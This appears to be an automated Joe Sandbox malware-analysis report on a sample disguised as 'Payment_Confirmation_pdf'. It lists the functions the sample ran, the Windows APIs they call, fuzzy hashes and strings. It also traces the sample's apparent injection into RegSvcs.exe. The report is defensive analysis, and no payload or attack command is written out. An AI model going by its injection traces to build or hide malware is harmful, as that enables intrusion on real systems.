APIs

CreateActCtxA.KERNEL32(?), ref: 013B59C9

Memory Dump Source

Source File: 00000000.00000002.1420717251.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_Payment_Confirmation_pdf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 757a47235880c56efcd63b9d80f24cd6c16e65162bfa2eb33468542f17afc861
Instruction ID: da1bc00c619351d6a8c18a1937b2f575b011ac1a54d0e3fe0e26c7d333bc5fc1
Opcode Fuzzy Hash: 757a47235880c56efcd63b9d80f24cd6c16e65162bfa2eb33468542f17afc861
Instruction Fuzzy Hash: 8C41F270C0071DCBEB25DFA9C884BCEBBB6BF49304F20806AD509AB251DB756946CF90

Function 013BD710 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013BD797

Memory Dump Source

Source File: 00000000.00000002.1420717251.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_Payment_Confirmation_pdf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9af120ffad970202c26f3fd63ba28dc8e1a2cf7c5e49c768dbad71eec2228ea5
Instruction ID: 37ef8c319f7105c744d7c8b8edab452b70b86cfe4f531286ba925a2966621d74
Opcode Fuzzy Hash: 9af120ffad970202c26f3fd63ba28dc8e1a2cf7c5e49c768dbad71eec2228ea5
Instruction Fuzzy Hash: 5621E4B5D002489FDB10CF9AD885ADEBFF5EB48324F14841AE918A3350D379A944CF61

Function 013BD709 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013BD797

Memory Dump Source

Source File: 00000000.00000002.1420717251.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_Payment_Confirmation_pdf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9a323584091aad974ad8f4416edb82d14a7de9d223ea7b628c2fd3d6272fbea7
Instruction ID: 22ed6b8b609a6382bbddf7b36b51fadf7b0f1e9f68e458419046bdf62a90c32e
Opcode Fuzzy Hash: 9a323584091aad974ad8f4416edb82d14a7de9d223ea7b628c2fd3d6272fbea7
Instruction Fuzzy Hash: 1621E4B5D002499FDB10CF99D985AEEBBF5EB08314F14842AE918B3350D378A944CF60

Function 013BB018 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 013BB07E

Memory Dump Source

Source File: 00000000.00000002.1420717251.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_Payment_Confirmation_pdf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4c34255b8de086d0ce82bacc84dfe0a41999b7494137bd5248ecafe398dafd89
Instruction ID: f975d58b718cd9d847b230c7a9a0f9b47aa40a052f86d6571a97c7a5aa2c591d
Opcode Fuzzy Hash: 4c34255b8de086d0ce82bacc84dfe0a41999b7494137bd5248ecafe398dafd89
Instruction Fuzzy Hash: 9811DFB5C003498FDB20DF9AC884BDEFBF5EB88224F10842AD569A7610D779A545CFA1

Function 012ED1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1416521999.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12ed000_Payment_Confirmation_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 019439d29e128c686ead67e1d753bae51612f7d06cd4353771bce8705f5c04c5
Instruction ID: 8475716bfa12df8d78bdd006605841c75623a0d4c7f5c708d0367b88b7b6caa8
Opcode Fuzzy Hash: 019439d29e128c686ead67e1d753bae51612f7d06cd4353771bce8705f5c04c5
Instruction Fuzzy Hash: 0F210372514208DFDF05DF94D9C8B26BBA5FB88320F60C5A9E9090B247C376D416CBA2

Function 012FD39C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1417009062.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fd000_Payment_Confirmation_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b87e1856a15649a849a691424dc0548ec06a619a20deb78326ef9963ba4182c
Instruction ID: 452eab0d902135cf2dcb33735161146f395606fe73138480dc0de63edec2deb5
Opcode Fuzzy Hash: 1b87e1856a15649a849a691424dc0548ec06a619a20deb78326ef9963ba4182c
Instruction Fuzzy Hash: 9D2100B56142089FDB05DF54D9C4B16FBA5EB84314F20C57DDA094B282C376E846CB62

Function 012FD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1417009062.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fd000_Payment_Confirmation_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f58cc280c84a9ba1afa5f121237c199614a03467060fe7c1791c9f9612359a94
Instruction ID: 44d12ba2a3fbc4493e57321e2f1bba6e15a5bebdfaa0e7b700c54052ef39a056
Opcode Fuzzy Hash: f58cc280c84a9ba1afa5f121237c199614a03467060fe7c1791c9f9612359a94
Instruction Fuzzy Hash: 5D210075614208DFDB15DF64D984B16FB61EB84314F20C57DEA0A4B286C376D807CA62

Function 012FD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1417009062.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fd000_Payment_Confirmation_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c49df9a2c9f68802ec300c9bd85ef5305acdabaf37321772eea737281dc933e
Instruction ID: 6746a9a547f5c25a1f0657832e69af0890e859e7a8d340ab449281d8b28a1d44
Opcode Fuzzy Hash: 4c49df9a2c9f68802ec300c9bd85ef5305acdabaf37321772eea737281dc933e
Instruction Fuzzy Hash: B72179755093848FCB06CF24D990B15BF71EB46314F28C5EED9498B2A7C33A980ACB62

Function 012ED1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1416521999.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12ed000_Payment_Confirmation_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fa0a9b6888ab601070468a7c49be392b44274aed9e91ce62da6c30ec0883e0c
Instruction ID: ea144ea67fa752d0d488d44e93d4bb9f4b7df8f1e385eb979b29980c1c94cab3
Opcode Fuzzy Hash: 6fa0a9b6888ab601070468a7c49be392b44274aed9e91ce62da6c30ec0883e0c
Instruction Fuzzy Hash: 5821CD76504244CFDB06CF54D9C4B16BFA2FB84320F24C1AADD080A257C33AD426CBA1

Function 012FD397 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1417009062.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fd000_Payment_Confirmation_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction ID: f130409be4c11694321c336667afcab914e61c1e281aa56fd5d951ba6bc23814
Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction Fuzzy Hash: AD11BE75504244DFCB06CF54D5C4B55FB61FB84314F24C6ADDA494B256C33AE44ACB61

Non-executed Functions

Function 013BD63C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420717251.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_Payment_Confirmation_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba645316b1ba38320b12e21c46ce69e127b27577e2fdbeb590f63371b8fb5b99
Instruction ID: d4161569ce04aa692624dc46cfdd85d77afda52d974a34264c86be4ca4b5dc39
Opcode Fuzzy Hash: ba645316b1ba38320b12e21c46ce69e127b27577e2fdbeb590f63371b8fb5b99
Instruction Fuzzy Hash: F3A18136E002198FCF15DFB8C8805DEBBB6FF84304B15956AEA05AF665EB31E905CB40

Analysis Process: RegSvcs.exePID: 8032, Parent PID: 7436COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	4.7%
Signature Coverage:	8.8%
Total number of Nodes:	148
Total number of Limit Nodes:	11

Executed Functions

Function 00417AC3 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B35

Memory Dump Source

Source File: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: a906ef9f31b45e18ae2e58ca7185c19609d2c3edd97fcc1d2ed25c7f5900b66e
Instruction ID: 85ec300ad7e3bf87eb3ec33c385cea1828a43b2c1769026b01b249a8b40dda6b
Opcode Fuzzy Hash: a906ef9f31b45e18ae2e58ca7185c19609d2c3edd97fcc1d2ed25c7f5900b66e
Instruction Fuzzy Hash: 0B0175B1E0410DBBDF10DBE5DD42FDEB3789B14308F4081A6E90897241F674EB488795

Function 0042C983 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C9B7

Memory Dump Source

Source File: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: d455cc25c6fa6859147991c283176d5fa10c052c132fdc399feeef08a75897da
Instruction ID: cf24ea8bab9471c9394b10296e0f3c990884b57d23af52157aeed086e7eb975a
Opcode Fuzzy Hash: d455cc25c6fa6859147991c283176d5fa10c052c132fdc399feeef08a75897da
Instruction Fuzzy Hash: 60E04F726012147BD210AA5ADC41E9B775CEBC5714F408419FA48A7342C675B91186E9

Function 01462B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01462B6A

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: add815d2a5a7a64ad90e60a8563ee0ce6ad9d0bce20c52a84069633e08206745
Instruction ID: 15e6bfd57ade6d6efddfd964209354e4d5e1da77aa9a736fd7b3ff6562d2a033
Opcode Fuzzy Hash: add815d2a5a7a64ad90e60a8563ee0ce6ad9d0bce20c52a84069633e08206745
Instruction Fuzzy Hash: B490027120240103410571584418656400A97F0201B55C032E1014591DC63589956225

Function 01462DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01462DFA

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: da0f6553456adf455130c60495fe9af2d98bd298f454b3c8d93f2cdc9daa8dcf
Instruction ID: c750160baa19f715617bd432b86c03dba9cae87245b9cbae0d6f6da60ecea77a
Opcode Fuzzy Hash: da0f6553456adf455130c60495fe9af2d98bd298f454b3c8d93f2cdc9daa8dcf
Instruction Fuzzy Hash: CC90023120140513D11171584508747000997E0241F95C423A0424559DD7668A56A221

Function 01462C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01462C7A

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f09be347fbdf522eb15a2869874e6af3d2dbe073f1c1f0a47515d74d8572f376
Instruction ID: d804c3e64f1c276b3b48b8df6143221833a54c226848d930eebd924a35dccc88
Opcode Fuzzy Hash: f09be347fbdf522eb15a2869874e6af3d2dbe073f1c1f0a47515d74d8572f376
Instruction Fuzzy Hash: F190023120148902D1107158840878A000597E0301F59C422A4424659DC7A589957221

Function 014635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 014635CA

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 67bd818040d254c19299f56d314ca54b03b5123eb15fb2331032bee312583048
Instruction ID: 42431dc34975e4505897ffb0f278cf6122599ea87fc3b2db91252f76c4984271
Opcode Fuzzy Hash: 67bd818040d254c19299f56d314ca54b03b5123eb15fb2331032bee312583048
Instruction Fuzzy Hash: 4C90023160550502D10071584518746100597E0201F65C422A0424569DC7A58A5566A2

Function 00414328 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(I130O15,00000111,00000000,00000000), ref: 004143AA

Strings

I130O15, xrefs: 0041439F, 004143A9, 004143BA
I130O15, xrefs: 004143B1, 004143B4

Memory Dump Source

Source File: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: I130O15$I130O15
API String ID: 1836367815-3409266677
Opcode ID: 6684cfdd1f1671d53cf00dd3ba155f4c41e9365b70e4de2108dfb1b9814b186b
Instruction ID: 31d067c27ce7e60a5001ff70b41e75f593da1e920bba3ec93a240c06ae4dddc9
Opcode Fuzzy Hash: 6684cfdd1f1671d53cf00dd3ba155f4c41e9365b70e4de2108dfb1b9814b186b
Instruction Fuzzy Hash: 81110A71D4010C7ED7119BA19C82DEFBFBCDF81798F4580AAFA1467241D6384A4A87E9

Function 00414333 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(I130O15,00000111,00000000,00000000), ref: 004143AA

Strings

I130O15, xrefs: 0041439F, 004143A9, 004143BA
I130O15, xrefs: 004143B1, 004143B4

Memory Dump Source

Source File: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: I130O15$I130O15
API String ID: 1836367815-3409266677
Opcode ID: 9855e5b62a82f7f9731ad0e00c6b0f7a1d43282dd202bfe8f7d21e6f49592cea
Instruction ID: da83c1094935ef769818b01bdbdf88093f7488f1381d0aca91dd75c39da613a9
Opcode Fuzzy Hash: 9855e5b62a82f7f9731ad0e00c6b0f7a1d43282dd202bfe8f7d21e6f49592cea
Instruction Fuzzy Hash: 2801D6B2E0011C7ADB10AAE29C81DEFBB7CDF41798F448069FA1467241D67C4E0A47B9

Function 00417B66 Relevance: 1.6, APIs: 1, Instructions: 62
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B35

Memory Dump Source

Source File: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2a4877de3ab38fcd66a74c2feb24b935705f973e38b0e2d5d2aec6d285c1986e
Instruction ID: 68cdeca346d35fb34d904a1717cefdcf981d2e98a7cf94e3822ae669b9bfa3fe
Opcode Fuzzy Hash: 2a4877de3ab38fcd66a74c2feb24b935705f973e38b0e2d5d2aec6d285c1986e
Instruction Fuzzy Hash: 2A117A3590C1859BCB06CF74D8516DABBB4EF4270CB6582CAD4858F146E235D697C7C1

Function 0042CCD3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,1C588B24,00000007,00000000,00000004,00000000,0041734B,000000F4), ref: 0042CD0C

Memory Dump Source

Source File: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: a77fb4d76808815fb4c39ac3582960cb882deaeb1e95a6d216d723fd855a594c
Instruction ID: 98ee737e8a7e142691a69487e85474ce60955f1355bfbabdd52204a28090c51f
Opcode Fuzzy Hash: a77fb4d76808815fb4c39ac3582960cb882deaeb1e95a6d216d723fd855a594c
Instruction Fuzzy Hash: 53E06DB26042087BD610EE59DC41EAB37ACEFC9710F000419FA08A7241D674B91086F8

Function 0042CC93 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E85E,?,?,00000000,?,0041E85E,?,?,?), ref: 0042CCCC

Memory Dump Source

Source File: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4e795ad3abe48be91c9768a8c28ff3aa56d5b80a9b26f967635e1cd9e3235224
Instruction ID: 735cc1ea21d3193d45840a595983d75bb8b9258a4762a6d953b28341c442f013
Opcode Fuzzy Hash: 4e795ad3abe48be91c9768a8c28ff3aa56d5b80a9b26f967635e1cd9e3235224
Instruction Fuzzy Hash: 5AE0EDB26042187BD614EE59DC41EAB77ACEFC5714F004419FE08A7242D675B95186B8

Function 0042CD13 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,0000E934,?,?,0000E934), ref: 0042CD47

Memory Dump Source

Source File: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 94cb34bb670272ca3f35d8fa057e48407cd231f13534b7af3fe052762f7cd892
Instruction ID: cf49a35210b173e9913d4f39f63bec6c409ba42b77089890b2c44588182139b1
Opcode Fuzzy Hash: 94cb34bb670272ca3f35d8fa057e48407cd231f13534b7af3fe052762f7cd892
Instruction Fuzzy Hash: 4DE04F723406147BD620AA5AEC41F9B776CDFC5754F00845AFA1867281C6B5790087F8

Function 00417B43 Relevance: 1.5, APIs: 1, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B35

Memory Dump Source

Source File: 0000000A.00000002.1652562579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dafc9d77bb24dd9c684dee61d566ed27b36c235a6c29ef8d1e3c8508bb4aa5ed
Instruction ID: bce0a5e40328678734bcb9fc0fbb0637af48228f8683d2e30f1ac46fd5b01f54
Opcode Fuzzy Hash: dafc9d77bb24dd9c684dee61d566ed27b36c235a6c29ef8d1e3c8508bb4aa5ed
Instruction Fuzzy Hash: 3DD02BB440920C77E52065C95C06FDB7F7DCB81604F000249BD09551419A10A911C5ED

Function 01462C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01462C24

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f6f74bcd47975b36e83420b2ea5e622f9a13712478cd2502d361d0fde4ba2153
Instruction ID: 1652681ba7f666d9345951e9e80a9fa7bcf55f6ad23245ccebe64a66eb6d4bd1
Opcode Fuzzy Hash: f6f74bcd47975b36e83420b2ea5e622f9a13712478cd2502d361d0fde4ba2153
Instruction Fuzzy Hash: 62B09B719015C5D9DA11F764460CB17790477D0705F15C073D3030653F4778C1D5E276

Non-executed Functions

Function 014D8D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE

Download Yara Rule

Strings

*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 014D8FEF
read from, xrefs: 014D8F5D, 014D8F62
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 014D8DC4
The resource is owned shared by %d threads, xrefs: 014D8E2E
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 014D8E86
*** enter .exr %p for the exception record, xrefs: 014D8FA1
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 014D8E4B
a NULL pointer, xrefs: 014D8F90
*** A stack buffer overrun occurred in %ws:%s, xrefs: 014D8DA3
*** Inpage error in %ws:%s, xrefs: 014D8EC8
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 014D8D8C
*** enter .cxr %p for the context, xrefs: 014D8FBD
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 014D8F34
<unknown>, xrefs: 014D8D2E, 014D8D81, 014D8E00, 014D8E49, 014D8EC7, 014D8F3E
The instruction at %p referenced memory at %p., xrefs: 014D8EE2
This failed because of error %Ix., xrefs: 014D8EF6
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 014D8DB5
The critical section is owned by thread %p., xrefs: 014D8E69
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 014D8DD3
*** An Access Violation occurred in %ws:%s, xrefs: 014D8F3F
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 014D8F2D
The resource is owned exclusively by thread %p, xrefs: 014D8E24
Go determine why that thread has not released the critical section., xrefs: 014D8E75
*** then kb to get the faulting stack, xrefs: 014D8FCC
write to, xrefs: 014D8F56
an invalid address, %p, xrefs: 014D8F7F
The instruction at %p tried to %s , xrefs: 014D8F66
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 014D8F26
*** Resource timeout (%p) in %ws:%s, xrefs: 014D8E02
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 014D8E3F

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 030f583988c73d1fe4b59da919439c7fd85335a120296358d6a07541c51f2e95
Instruction ID: 7944aff4abdcd1c0cc13789f88e0605f125cd1171acaee58ea70b30f2c6177a3
Opcode Fuzzy Hash: 030f583988c73d1fe4b59da919439c7fd85335a120296358d6a07541c51f2e95
Instruction Fuzzy Hash: 8A81C676640201BFDF119B5A9CA5DBF3F35EB66B24F45004FF208AB276E3758412CA61

Function 014A2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

@, xrefs: 014A2B74
GlobalFlag2, xrefs: 014A2FC0
minkernel\ntdll\ldrinit.c, xrefs: 014A3187
ExecuteOptions, xrefs: 014A25A0
MaxLoaderThreads, xrefs: 014A24EC
DisableExceptionChainValidation, xrefs: 014A275F
UnloadEventTraceDepth, xrefs: 014A24C0
LdrpInitializeExecutionOptions, xrefs: 014A317D
TracingFlags, xrefs: 014A2549
CFGOptions, xrefs: 014A2967
MinimumStackCommitInBytes, xrefs: 014A2BB0
ShutdownFlags, xrefs: 014A24A1
Initializing the application verifier package failed with status 0x%08lx, xrefs: 014A3176
UseImpersonatedDeviceMap, xrefs: 014A251C
RaiseExceptionOnPossibleDeadlock, xrefs: 014A2579
GlobalFlag, xrefs: 014A2F3F, 014A3059
DisableHeapLookaside, xrefs: 014A246D
MaxDeadActivationContexts, xrefs: 014A2D82
@, xrefs: 014A2942
FrontEndHeapDebugOptions, xrefs: 014A2489

Memory Dump Source

Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: cd26dd6bc3e9509f823b6d19694b27e405d7f331e83a29fc3f35ffdb26f689d7
Instruction ID: dd9530ebf40027f84f1df2b409238e44b1b0245f33776a6a8d7d4067ec8241cf
Opcode Fuzzy Hash: cd26dd6bc3e9509f823b6d19694b27e405d7f331e83a29fc3f35ffdb26f689d7
Instruction Fuzzy Hash: 6292C071604342AFE721CF19C840F6BBBE8BBA4754F45482EFA94D7260D7B0E845DB92

